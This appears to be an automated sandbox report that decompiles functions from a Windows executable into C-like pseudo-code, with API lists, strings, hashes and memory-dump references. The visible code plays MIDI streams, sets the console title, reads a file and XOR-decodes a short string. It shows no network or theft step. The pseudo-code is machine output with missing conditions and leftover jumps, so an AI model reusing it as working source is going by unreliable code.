									goto L25;
								}
							}
							goto L25;
						}
						E003B8650(_t137);
						_t181 =  *0x6f6300; // 0x0
						_t116 =  *((intOrPtr*)(_t181 + 0x18));
						if( *((intOrPtr*)(_t181 + 0x4c)) == 0) {
							if(_t116 != 0) {
								E003B8460(_t181, 1);
							}
							 *((intOrPtr*)(_t181 + 0x50)) = 0;
							if( *((intOrPtr*)(_t181 + 0x24)) == 0) {
								 *((intOrPtr*)(_t181 + 0x38)) = 1;
							}
							_t117 = midiStreamRestart( *(_t181 + 0x1c));
							if(_t117 == 0) {
								 *((intOrPtr*)(_t181 + 0x18)) = 1;
								 *((intOrPtr*)(_t181 + 0x24)) = 0;
							} else {
								 *((intOrPtr*)( *_t181 + 4))(_t117);
							}
							L18:
							_t181 =  *0x6f6300; // 0x0
							goto L19;
						}
						if(_t116 == 0 ||  *((intOrPtr*)(_t181 + 8)) == 0) {
							goto L19;
						} else {
							_t120 =  *(_t181 + 0x1c);
							if(_t120 == 0) {
								goto L19;
							}
							midiStreamRestart(_t120);
							 *((intOrPtr*)(_t181 + 0x4c)) = 0;
							goto L18;
						}
					}
				}
				L57:
				 *0x6f62f6 = 1;
				_t89 =  >=  ?  *0x6f5bb4 : 0x6f5bb4;
				SetConsoleTitleA( >=  ?  *0x6f5bb4 : 0x6f5bb4);
				return E003BE3D0(_v8 ^ _t189);
			}

0x003b9d86
0x003b9d8d
0x003b9d93
0x003b9d93
0x003b9d9e
0x003b9db3
0x00000000
0x00000000
0x003b9dc5
0x003b9dcd
0x003b9dd1
0x003b9dd8
0x003b9dde
0x003b9df1
0x003b9dfb
0x003b9e03
0x003b9e06
0x003b9e08
0x003b9e0d
0x003b9e0f
0x003b9e15
0x003b9e18
0x003b9e1b
0x003b9e23
0x003b9e29
0x003b9e2f
0x003b9e32
0x003b9e37
0x003b9e3c
0x003b9e3f
0x003b9e45
0x003b9e4d
0x003b9eff
0x003b9f03
0x003b9f08
0x003b9f10
0x003b9f1b
0x003b9f24
0x003b9f2e
0x003ba07d
0x003ba07d
0x003ba089
0x00000000
0x003ba089
0x003b9f34
0x003b9f36
0x003b9f40
0x003b9f47
0x003b9f4a
0x003b9f52
0x003b9f59
0x003b9f5f
0x003b9f61
0x003b9f61
0x003b9f63
0x003b9f69
0x003b9f6f
0x003b9f72
0x003b9f85
0x003b9f88
0x003b9fbe
0x003b9fbe
0x003b9fc0
0x003b9fc2
0x00000000
0x00000000
0x003b9fc8
0x003b9fcd
0x003b9ffc
0x003b9ffc
0x003ba002
0x003ba02c
0x003ba02c
0x003ba033
0x003ba03a
0x003ba03e
0x003ba044
0x003ba047
0x00000000
0x003ba047
0x003ba004
0x003ba007
0x003ba00e
0x003ba022
0x003ba022
0x003ba024
0x003ba029
0x00000000
0x003ba029
0x003ba010
0x003ba013
0x003ba01e
0x003ba093
0x00000000
0x003ba093
0x003ba020
0x00000000
0x003ba020
0x003b9fcf
0x003b9fd2
0x003b9fd6
0x003b9fdb
0x003b9fde
0x003b9fe1
0x003b9fe4
0x003b9fe9
0x003b9fef
0x003b9ff2
0x003b9ff6
0x00000000
0x003b9ff6
0x003b9f8a
0x003b9f8a
0x003b9f8e
0x003b9fb7
0x003b9fb7
0x003b9fb9
0x00000000
0x003b9fb9
0x003b9f93
0x00000000
0x00000000
0x003b9f95
0x003b9f98
0x003b9f9b
0x00000000
0x00000000
0x003b9fa0
0x00000000
0x00000000
0x003b9fa2
0x003b9fa5
0x003b9fa8
0x00000000
0x00000000
0x003b9fad
0x00000000
0x00000000
0x003b9faf
0x003b9fb2
0x003b9fb5
0x00000000
0x00000000
0x00000000
0x003b9fb5
0x003b9f74
0x003b9f7a
0x003b9f7d
0x003b9f80
0x003b9f83
0x00000000
0x00000000
0x00000000
0x003b9f83
0x00000000
0x003b9f74
0x003ba04d
0x003ba04d
0x003ba05a
0x003ba064
0x003ba067
0x003ba06c
0x003ba074
0x00000000
0x003b9e53
0x003b9e56
0x003b9ed1
0x003b9ed3
0x00000000
0x00000000
0x003b9ed5
0x003b9ee2
0x003b9eea
0x003b9eea
0x003b9ef3
0x003b9ef5
0x003b9efd
0x00000000
0x00000000
0x00000000
0x00000000
0x003b9efd
0x00000000
0x003b9ed5
0x003b9e58
0x003b9e5d
0x003b9e67
0x003b9e6a
0x003b9e8b
0x003b9e91
0x003b9e91
0x003b9e9a
0x003b9ea1
0x003b9ea3
0x003b9ea3
0x003b9ead
0x003b9eb1
0x003b9ebd
0x003b9ec4
0x003b9eb3
0x003b9eb8
0x003b9eb8
0x003b9ecb
0x003b9ecb
0x00000000
0x003b9ecb
0x003b9e6e
0x00000000
0x003b9e76
0x003b9e76
0x003b9e7b
0x00000000
0x00000000
0x003b9e7e
0x003b9e80
0x00000000
0x003b9e80
0x003b9e6e
0x003b9e4d
0x003ba099
0x003ba0a5
0x003ba0ac
0x003ba0b4
0x003ba0cc

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 003B9DD1
srand.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 003B9DD8
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 003B9DFB

Part of subcall function 003B9940: memset.VCRUNTIME140(00000000,00000000,000000A4), ref: 003B99B2
Part of subcall function 003B9940: CreateEventA.KERNEL32(00000000,00000000,00000000,Wait For Buffer Return), ref: 003B9ACF

midiStreamRestart.WINMM(?), ref: 003B9E7E
midiStreamRestart.WINMM(?), ref: 003B9EAD
Sleep.KERNEL32(00000064), ref: 003B9EF3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 003BA093
SetConsoleTitleA.KERNEL32(006F5BB4), ref: 003BA0B4

Strings

[^K/, xrefs: 003B9D86
(co, xrefs: 003B9F4D
(co, xrefs: 003BA084

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: RestartStreammidi$ConsoleCreateEventSleepTitle_invalid_parameter_noinfo_noreturn_time64memsetrandsrand
String ID: (co$(co$[^K/
API String ID: 747831292-3486511725
Opcode ID: c92123fb2e1c54f1f70767f8d11aec4baadeb0f76c1b633394ebd1584f0c38c1
Instruction ID: b431e4f6fe06d6d3770b59b923cca7b4b61b761221c197221835c498005a1865
Opcode Fuzzy Hash: c92123fb2e1c54f1f70767f8d11aec4baadeb0f76c1b633394ebd1584f0c38c1
Instruction Fuzzy Hash: E3A1E632A006108FDB26DF29D8947BABBF2FB44318F15565AE6428BB91C771FC44CB80

Uniqueness

Uniqueness Score: -1.00%

Function 003B9940 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 276
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E003B9940(void* __edx, void* __edi) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v16;
				char _v24;
				signed int _v29;
				char _v34;
				char _v35;
				char _v36;
				void* _v40;
				char _v41;
				intOrPtr _v44;
				char _v55;
				signed int _v56;
				char _v64;
				struct _SECURITY_ATTRIBUTES* _v68;
				struct _SECURITY_ATTRIBUTES* _v72;
				char _v88;
				struct _SECURITY_ATTRIBUTES* _v92;
				struct _SECURITY_ATTRIBUTES* _v96;
				char _v112;
				void* __ebx;
				void* __esi;
				signed int _t114;
				char _t129;
				intOrPtr _t130;
				char* _t136;
				char* _t138;
				intOrPtr _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t147;
				intOrPtr _t150;
				intOrPtr _t153;
				intOrPtr _t156;
				void* _t161;
				void* _t162;
				void* _t165;
				char* _t166;
				intOrPtr _t178;
				char _t179;
				char _t180;
				intOrPtr _t181;
				void* _t182;
				void* _t183;
				intOrPtr _t184;
				struct _SECURITY_ATTRIBUTES* _t185;
				struct _SECURITY_ATTRIBUTES* _t186;
				void* _t187;
				intOrPtr _t188;
				void* _t189;
				DWORD* _t190;
				DWORD* _t191;
				void* _t192;
				void* _t193;
				void* _t195;
				signed int _t199;
				void* _t201;
				signed int _t204;
				void* _t205;
				void* _t207;

				_t193 = __edi;
				_t182 = __edx;
				_t161 = _t201;
				_t204 = (_t201 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t161 + 4));
				_t199 = _t204;
				_push(0xffffffff);
				_push(E003BF9FC);
				_push( *[fs:0x0]);
				_push(_t161);
				_t205 = _t204 - 0x54;
				_t114 =  *0x3c500c; // 0x4b5ee95b
				_push(_t114 ^ _t199);
				 *[fs:0x0] =  &_v24;
				_v40 = 0;
				_v16 = 0;
				_t162 =  *0x6f6300; // 0x0
				if(_t162 != 0) {
					 *( *_t162)(1);
				}
				_push(0xa4);
				_t195 = E003BE3E1();
				_v40 = _t195;
				memset(_t195, 0, 0xa4);
				_t207 = _t205 + 0x10;
				 *_t195 = 0x3c1510;
				 *(_t195 + 4) = 0;
				 *(_t195 + 8) = 0;
				 *(_t195 + 0xc) = 0;
				 *(_t195 + 0x10) = 0;
				 *(_t195 + 0x14) = 0;
				 *(_t195 + 0x18) = 0;
				 *(_t195 + 0x1c) = 0;
				 *(_t195 + 0x20) = 0;
				 *(_t195 + 0x24) = 0;
				 *(_t195 + 0x28) = 0;
				 *(_t195 + 0x2c) = 0;
				 *(_t195 + 0x30) = 0;
				 *((intOrPtr*)(_t195 + 0x34)) = 0x64;
				 *(_t195 + 0x38) = 0;
				 *(_t195 + 0x3c) = 0;
				 *(_t195 + 0x40) = 0;
				 *((intOrPtr*)(_t195 + 0x44)) = 0xffffffff;
				 *(_t195 + 0x48) = 0;
				 *(_t195 + 0x4c) = 0;
				 *(_t195 + 0x50) = 0;
				 *(_t195 + 0x54) = 0;
				 *(_t195 + 0x5c) = 0;
				 *(_t195 + 0x60) = 0;
				 *(_t195 + 0x64) = 0;
				 *(_t195 + 0x68) = 0;
				 *(_t195 + 0x6c) = 0;
				 *(_t195 + 0x70) = 0;
				 *(_t195 + 0x74) = 0;
				 *(_t195 + 0x78) = 0;
				 *(_t195 + 0x7c) = 0;
				 *(_t195 + 0x80) = 0;
				 *(_t195 + 0x84) = 0;
				 *(_t195 + 0x88) = 0;
				 *(_t195 + 0x8c) = 0;
				 *(_t195 + 0x90) = 0;
				 *(_t195 + 0x54) = CreateEventA(0, 0, 0, "Wait For Buffer Return");
				_push( *((intOrPtr*)(_t161 + 0x18)));
				_t121 =  >=  ?  *((void*)(_t161 + 8)) : _t161 + 8;
				 *0x6f6300 = _t195;
				E003B51D0(0x6f6328, _t182,  >=  ?  *((void*)(_t161 + 8)) : _t161 + 8);
				asm("movaps xmm0, [0x3c1610]");
				 *0x6f6340 =  *((intOrPtr*)(_t161 + 0x20));
				 *0x6f6344 =  *((intOrPtr*)(_t161 + 0x24));
				 *0x6f6348 =  *((intOrPtr*)(_t161 + 0x28));
				_v36 = 0x4f;
				_v34 = 0;
				_t165 = 0;
				_v35 = 0x29;
				_v34 = 0;
				asm("movups [ebp-0x2c], xmm0");
				goto L3;
				do {
					L5:
					_t129 =  *_t166;
					_t166 = _t166 + 1;
				} while (_t129 != 0);
				_t130 =  *0x6f5bc4; // 0x24
				E003B5DD0(_t161,  &_v88, _t193, _t195, _t130 + _t166 - _t183);
				E003B4D60( &_v88, 0x6f5bb4);
				E003B4CF0( &_v88,  &_v55);
				_t136 = E003B4D60( &_v88, 0x6f6328);
				_v96 = 0;
				_v92 = 0;
				_v40 = 3;
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x64], xmm0");
				asm("movq xmm0, [eax+0x10]");
				asm("movq [ebp-0x54], xmm0");
				 *(_t136 + 0x10) = 0;
				 *(_t136 + 0x14) = 0xf;
				 *_t136 = 0;
				_v16 = 2;
				_t138 = E003B4CF0( &_v112,  &_v35);
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x34], xmm0");
				asm("movq xmm0, [eax+0x10]");
				 *(_t138 + 0x10) = 0;
				 *(_t138 + 0x14) = 0xf;
				 *_t138 = 0;
				asm("movq [ebp-0x24], xmm0");
				E003B4E60(0x6f5c88,  &_v64);
				_t184 = _v44;
				if(_t184 < 0x10) {
					L11:
					_v16 = 1;
					_t185 = _v92;
					if(_t185 >= 0x10) {
						_t180 = _v112;
						_t191 =  &(_t185->nLength);
						_t153 = _t180;
						if(_t191 >= 0x1000) {
							_t180 =  *((intOrPtr*)(_t180 - 4));
							_t191 = _t191 + 0x23;
							if(_t153 > 0x1f) {
								__imp___invalid_parameter_noinfo_noreturn();
							}
						}
						_push(_t191);
						E003BE78C(_t153, _t180);
						_t207 = _t207 + 8;
					}
					_v16 = 0;
					_t186 = _v68;
					_v96 = 0;
					_v92 = 0xf;
					_v112 = 0;
					if(_t186 >= 0x10) {
						_t179 = _v88;
						_t190 =  &(_t186->nLength);
						_t150 = _t179;
						if(_t190 >= 0x1000) {
							_t179 =  *((intOrPtr*)(_t179 - 4));
							_t190 = _t190 + 0x23;
							if(_t150 > 0x1f) {
								__imp___invalid_parameter_noinfo_noreturn();
							}
						}
						_push(_t190);
						E003BE78C(_t150, _t179);
						_t207 = _t207 + 8;
					}
					_v72 = 0;
					_v68 = 0xf;
					_v88 = 0;
					E003B82C0(_t161, _t193, _t195,  *((intOrPtr*)(_t161 + 0x20)),  *((intOrPtr*)(_t161 + 0x24)));
					_t142 =  *((intOrPtr*)(_t161 + 0x28));
					_t187 =  *0x6f6300; // 0x0
					_t175 =  !=  ? _t142 : 1;
					 *((intOrPtr*)(_t187 + 0x34)) =  !=  ? _t142 : 1;
					 *(_t187 + 0x38) = 1;
					_t144 =  >=  ?  *0x6f5c88 : 0x6f5c88;
					_t145 = SetConsoleTitleA( >=  ?  *0x6f5c88 : 0x6f5c88);
					_t188 =  *((intOrPtr*)(_t161 + 0x1c));
					_t146 = _t145 & 0xffffff00 | _t145 != 0x00000000;
					_v29 = _t146;
					if(_t188 >= 0x10) {
						_t178 =  *((intOrPtr*)(_t161 + 8));
						_t189 = _t188 + 1;
						_t147 = _t178;
						if(_t189 >= 0x1000) {
							_t178 =  *((intOrPtr*)(_t178 - 4));
							_t189 = _t189 + 0x23;
							if(_t147 > 0x1f) {
								__imp___invalid_parameter_noinfo_noreturn();
							}
						}
						_push(_t189);
						E003BE78C(_t147, _t178);
						_t146 = _v29;
					}
					 *[fs:0x0] = _v24;
					return _t146;
				}
				_t181 = _v64;
				_t192 = _t184 + 1;
				_t156 = _t181;
				if(_t192 >= 0x1000) {
					_t181 =  *((intOrPtr*)(_t181 - 4));
					_t192 = _t192 + 0x23;
					if(_t156 > 0x1f) {
						__imp___invalid_parameter_noinfo_noreturn();
					}
				}
				_push(_t192);
				E003BE78C(_t156, _t181);
				_t207 = _t207 + 8;
				goto L11;
				L3:
				 *(_t199 + _t165 - 0x2b) =  *(_t199 + _t165 - 0x2b) ^ _v56;
				_t165 = _t165 + 1;
				if(_t165 < 0xe) {
					goto L3;
				} else {
					_v41 = 0;
					_v16 = 1;
					_t166 =  &_v55;
					_v72 = 0;
					_t183 = _t166 + 1;
					_v68 = 0xf;
					_v88 = 0;
					_v40 = 1;
					goto L5;
				}
			}

0x003b9940
0x003b9940
0x003b9941
0x003b9949
0x003b9950
0x003b9954
0x003b9956
0x003b9958
0x003b9963
0x003b9964
0x003b9965
0x003b9969
0x003b9970
0x003b9974
0x003b997a
0x003b9981
0x003b9988
0x003b9990
0x003b9996
0x003b9996
0x003b9998
0x003b99a5
0x003b99a7
0x003b99b2
0x003b99b7
0x003b99ba
0x003b99c0
0x003b99c7
0x003b99ce
0x003b99d5
0x003b99dc
0x003b99e3
0x003b99ea
0x003b99f1
0x003b99f8
0x003b99ff
0x003b9a06
0x003b9a0d
0x003b9a14
0x003b9a1b
0x003b9a22
0x003b9a29
0x003b9a30
0x003b9a37
0x003b9a3e
0x003b9a45
0x003b9a4c
0x003b9a53
0x003b9a5a
0x003b9a61
0x003b9a68
0x003b9a6f
0x003b9a76
0x003b9a84
0x003b9a8b
0x003b9a92
0x003b9a9d
0x003b9aa7
0x003b9ab1
0x003b9abb
0x003b9ac5
0x003b9ad5
0x003b9ae4
0x003b9ae7
0x003b9aec
0x003b9af2
0x003b9afc
0x003b9b03
0x003b9b0b
0x003b9b13
0x003b9b1c
0x003b9b1f
0x003b9b23
0x003b9b25
0x003b9b28
0x003b9b2c
0x003b9b2c
0x003b9b64
0x003b9b64
0x003b9b64
0x003b9b66
0x003b9b67
0x003b9b6b
0x003b9b78
0x003b9b85
0x003b9b91
0x003b9b9e
0x003b9ba3
0x003b9baa
0x003b9bb1
0x003b9bb8
0x003b9bbb
0x003b9bbf
0x003b9bc4
0x003b9bc9
0x003b9bd0
0x003b9bd7
0x003b9bdd
0x003b9be5
0x003b9bef
0x003b9bf2
0x003b9bf6
0x003b9bfb
0x003b9c02
0x003b9c09
0x003b9c10
0x003b9c15
0x003b9c1a
0x003b9c20
0x003b9c50
0x003b9c50
0x003b9c54
0x003b9c5a
0x003b9c5c
0x003b9c5f
0x003b9c60
0x003b9c68
0x003b9c6a
0x003b9c6d
0x003b9c78
0x003b9c7a
0x003b9c7a
0x003b9c78
0x003b9c80
0x003b9c82
0x003b9c87
0x003b9c87
0x003b9c8a
0x003b9c8e
0x003b9c91
0x003b9c98
0x003b9c9f
0x003b9ca6
0x003b9ca8
0x003b9cab
0x003b9cac
0x003b9cb4
0x003b9cb6
0x003b9cb9
0x003b9cc4
0x003b9cc6
0x003b9cc6
0x003b9cc4
0x003b9ccc
0x003b9cce
0x003b9cd3
0x003b9cd3
0x003b9cd9
0x003b9ce3
0x003b9cea
0x003b9cee
0x003b9cf3
0x003b9cfb
0x003b9d03
0x003b9d0b
0x003b9d0e
0x003b9d1c
0x003b9d24
0x003b9d2a
0x003b9d2f
0x003b9d32
0x003b9d38
0x003b9d3a
0x003b9d3d
0x003b9d3e
0x003b9d46
0x003b9d48
0x003b9d4b
0x003b9d56
0x003b9d58
0x003b9d58
0x003b9d56
0x003b9d5e
0x003b9d60
0x003b9d65
0x003b9d68
0x003b9d6e
0x003b9d7d
0x003b9d7d
0x003b9c22
0x003b9c25
0x003b9c26
0x003b9c2e
0x003b9c30
0x003b9c33
0x003b9c3e
0x003b9c40
0x003b9c40
0x003b9c3e
0x003b9c46
0x003b9c48
0x003b9c4d
0x00000000
0x003b9b30
0x003b9b33
0x003b9b37
0x003b9b3b
0x00000000
0x003b9b3d
0x003b9b3d
0x003b9b41
0x003b9b45
0x003b9b48
0x003b9b4f
0x003b9b52
0x003b9b59
0x003b9b5d
0x00000000
0x003b9b5d

APIs

memset.VCRUNTIME140(00000000,00000000,000000A4), ref: 003B99B2
CreateEventA.KERNEL32(00000000,00000000,00000000,Wait For Buffer Return), ref: 003B9ACF

Part of subcall function 003B4D60: memmove.VCRUNTIME140(00000000,00000000,?,?,00000001,?,?,003B3676,006F5B9C,?,0000001F,00000000,00000001), ref: 003B4D9F

Part of subcall function 003B4CF0: memmove.VCRUNTIME140(?,00000000,00000001,?,00000001,?,?,003B3666,?,0000001F,00000000,00000001), ref: 003B4D2C

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,006F6328,?,006F5BB4,00000024,00000000,003BF9FC), ref: 003B9C40
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,006F6328,?,006F5BB4,00000024,00000000,003BF9FC), ref: 003B9C7A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,006F6328,?,006F5BB4,00000024,00000000,003BF9FC), ref: 003B9CC6
SetConsoleTitleA.KERNEL32(006F5C88,?,?,?,?,006F6328,?,006F5BB4,00000024,00000000,003BF9FC), ref: 003B9D24
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003B9D58

Strings

Wait For Buffer Return, xrefs: 003B9A7D
[^K/, xrefs: 003B9969
(co, xrefs: 003B9AD8

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove$ConsoleCreateEventTitlememset
String ID: (co$Wait For Buffer Return$[^K/
API String ID: 2340064618-4022572760
Opcode ID: c5c1cff056e27ea719c3b50f83302dce0e65deb95b089ee2ef8dcd74284cca53
Instruction ID: c001ebd626f200509fe7bc945b7c3a0f9b4ad878c340d75c2bc499169c4b430c
Opcode Fuzzy Hash: c5c1cff056e27ea719c3b50f83302dce0e65deb95b089ee2ef8dcd74284cca53
Instruction Fuzzy Hash: ABC1BCB09007448FEB15CF68C9987DEBBF1BF05308F10865CE5569B692C7BAA548CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003BD8E0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E003BD8E0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v21;
				intOrPtr _v28;
				char _v32;
				char _v48;
				int _v52;
				char _v56;
				char _v60;
				int _v64;
				char _v68;
				signed int _t84;
				signed int _t85;
				int _t89;
				int _t96;
				void* _t101;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t113;
				void* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t141;
				intOrPtr _t143;
				void* _t144;
				intOrPtr* _t151;
				intOrPtr* _t161;
				void* _t166;
				intOrPtr _t167;
				signed int _t168;
				void* _t169;
				void* _t170;
				void* _t171;

				_t153 = __edi;
				_push(0xffffffff);
				_push(E003BFEF8);
				_push( *[fs:0x0]);
				_t170 = _t169 - 0x34;
				_t84 =  *0x3c500c; // 0x4b5ee95b
				_t85 = _t84 ^ _t168;
				_v20 = _t85;
				_push(__edi);
				_push(_t85);
				 *[fs:0x0] =  &_v16;
				_t122 = __ecx;
				_t125 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))));
				if(_t125 == 0) {
					L3:
					if( *(_t122 + 0x4c) != 0) {
						_t161 =  *((intOrPtr*)(_t122 + 0xc));
						if( *_t161 == _t122 + 0x3c) {
							_t141 =  *((intOrPtr*)(_t122 + 0x50));
							 *_t161 = _t141;
							 *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x1c)))) = _t141;
							 *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x2c)))) =  *((intOrPtr*)(_t122 + 0x54)) - _t141;
						}
						if( *((intOrPtr*)(_t122 + 0x38)) != 0) {
							_v32 = 0;
							_v28 = 0xf;
							_v48 = 0;
							_v8 = 0;
							_t89 = fgetc( *(_t122 + 0x4c));
							_t171 = _t170 + 4;
							_v64 = _t89;
							if(_t89 != 0xffffffff) {
								while(1) {
									_t132 = _v32;
									_v52 = _t89;
									if(_t132 >= _v28) {
										_push(_v52);
										_v68 = 0;
										_push(_v68);
										E003B59B0(_t122,  &_v48, _t153, _t132);
									} else {
										_t27 = _t132 + 1; // 0x1
										_v32 = _t27;
										_t113 =  >=  ? _v48 :  &_v48;
										 *((char*)(_t113 + _t132)) = _v64;
										 *((char*)(_t113 + _t132 + 1)) = 0;
									}
									_t135 =  >=  ? _v48 :  &_v48;
									_t157 = _v32 + ( >=  ? _v48 :  &_v48);
									_t100 =  >=  ? _v48 :  &_v48;
									_t101 = _t122 + 0x40;
									__imp__?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z(_t101,  >=  ? _v48 :  &_v48, _v32 + ( >=  ? _v48 :  &_v48),  &_v56,  &_v21,  &_v20,  &_v60);
									if(_t101 < 0) {
										goto L18;
									}
									if(_t101 > 1) {
										if(_t101 != 3) {
											goto L18;
										} else {
											_t103 =  >=  ? _v48 :  &_v48;
											_t162 =  *( >=  ? _v48 :  &_v48);
											goto L19;
										}
										goto L32;
									} else {
										_t92 =  &_v48;
										if(_v60 !=  &_v21) {
											L23:
											_t95 =  >=  ? _v48 : _t92;
											_t131 = _v56;
											_t166 = _v32 - _t131 + ( >=  ? _v48 : _t92);
											if(_t166 > 0) {
												while(1) {
													_t96 =  *((char*)(_t166 + _t131 - 1));
													_t166 = _t166 - 1;
													ungetc(_t96,  *(_t122 + 0x4c));
													_t171 = _t171 + 8;
													if(_t166 <= 0) {
														goto L27;
													}
													_t131 = _v56;
												}
											}
											L27:
										} else {
											_t105 =  >=  ? _v48 :  &_v48;
											_t159 = _v56 - ( >=  ? _v48 :  &_v48);
											_t106 = _v32;
											_t153 =  <  ? _t106 : _v56 - ( >=  ? _v48 :  &_v48);
											_t147 =  >=  ? _v48 :  &_v48;
											_t107 = _t106 - _t153;
											_v32 = _t107;
											memmove( >=  ? _v48 :  &_v48, ( >=  ? _v48 :  &_v48) + _t153, _t107 + 1);
											_t89 = fgetc( *(_t122 + 0x4c));
											_t171 = _t171 + 0x10;
											_v64 = _t89;
											if(_t89 != 0xffffffff) {
												continue;
											} else {
												goto L18;
											}
										}
									}
									goto L19;
								}
								goto L18;
							}
							L19:
							_t143 = _v28;
							if(_t143 >= 0x10) {
								_t130 = _v48;
								_t144 = _t143 + 1;
								_t92 = _t130;
								if(_t144 < 0x1000) {
									L30:
									_push(_t144);
									E003BE78C(_t92, _t130);
								} else {
									_t130 =  *((intOrPtr*)(_t130 - 4));
									_t144 = _t144 + 0x23;
									_t92 = _t92 - _t130 + 0xfffffffc;
									if(_t92 <= 0x1f) {
										goto L30;
									} else {
										__imp___invalid_parameter_noinfo_noreturn();
										goto L23;
									}
								}
							}
						} else {
							if(fgetc( *(_t122 + 0x4c)) == 0xffffffff) {
								goto L4;
							} else {
							}
						}
					} else {
						L4:
					}
				} else {
					_t151 =  *((intOrPtr*)(__ecx + 0x2c));
					_t167 =  *_t151;
					_t87 = _t167 + _t125;
					if(_t125 >= _t167 + _t125) {
						goto L3;
					} else {
						 *_t151 = _t167 - 1;
						 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) + 1;
					}
				}
				L32:
				 *[fs:0x0] = _v16;
				return E003BE3D0(_v20 ^ _t168);
			}

0x003bd8e0
0x003bd8e3
0x003bd8e5
0x003bd8f0
0x003bd8f1
0x003bd8f4
0x003bd8f9
0x003bd8fb
0x003bd900
0x003bd901
0x003bd905
0x003bd90b
0x003bd910
0x003bd914
0x003bd939
0x003bd93d
0x003bd947
0x003bd94f
0x003bd954
0x003bd959
0x003bd95e
0x003bd963
0x003bd963
0x003bd969
0x003bd984
0x003bd98b
0x003bd992
0x003bd996
0x003bd9a0
0x003bd9a6
0x003bd9a9
0x003bd9af
0x003bd9b5
0x003bd9b5
0x003bd9bb
0x003bd9c0
0x003bd9df
0x003bd9e2
0x003bd9e6
0x003bd9ed
0x003bd9c2
0x003bd9c2
0x003bd9cb
0x003bd9d1
0x003bd9d5
0x003bd9d8
0x003bd9d8
0x003bd9ff
0x003bda03
0x003bda0c
0x003bda22
0x003bda26
0x003bda2e
0x00000000
0x00000000
0x003bda33
0x003bdb01
0x00000000
0x003bdb03
0x003bdb0a
0x003bdb0e
0x00000000
0x003bdb0e
0x00000000
0x003bda39
0x003bda3f
0x003bda42
0x003bdac0
0x003bdac7
0x003bdacb
0x003bdad0
0x003bdad4
0x003bdae0
0x003bdae3
0x003bdae8
0x003bdaea
0x003bdaec
0x003bdaf1
0x00000000
0x00000000
0x003bdaf3
0x003bdaf3
0x003bdae0
0x003bdaf8
0x003bda44
0x003bda4e
0x003bda52
0x003bda54
0x003bda59
0x003bda60
0x003bda64
0x003bda66
0x003bda70
0x003bda78
0x003bda7e
0x003bda81
0x003bda87
0x00000000
0x00000000
0x00000000
0x00000000
0x003bda87
0x003bda42
0x00000000
0x003bda33
0x00000000
0x003bd9b5
0x003bda90
0x003bda90
0x003bda96
0x003bda9c
0x003bda9f
0x003bdaa0
